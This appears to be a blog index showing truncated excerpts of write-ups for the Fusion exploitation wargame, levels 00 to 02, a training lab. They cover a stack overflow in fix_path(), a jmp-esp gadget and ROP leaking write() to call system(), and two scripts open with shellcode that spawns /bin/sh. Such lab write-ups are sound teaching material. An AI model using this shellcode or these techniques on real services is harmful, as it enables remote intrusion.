Fusion Level02 - There is xor encryption with random value. First getting xor table.- just ROP!. leaking write() address and get system() address with 'offset'. - i just use system(). There is another way to get shell. execve()- Using execve() would be more cleaner and comfortable for making payload. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525..
Fusion Level01 - Still NX is disabled but ASLR is on. - Now, we can't get buffer address from binary. - All u need is 'jmp esp' gadget 1234567891011121314151617from pwn import * # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x..
Fusion Level00- There aren't any memory protections even NX. So i just use shell-code.- That service is on port 20000. and be careful at 'fd'. - In fix_path(), There is stack buffer overflow vulnerability.- RET -> 140 ~ 143 123456789101112131415161718from pwn import # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\..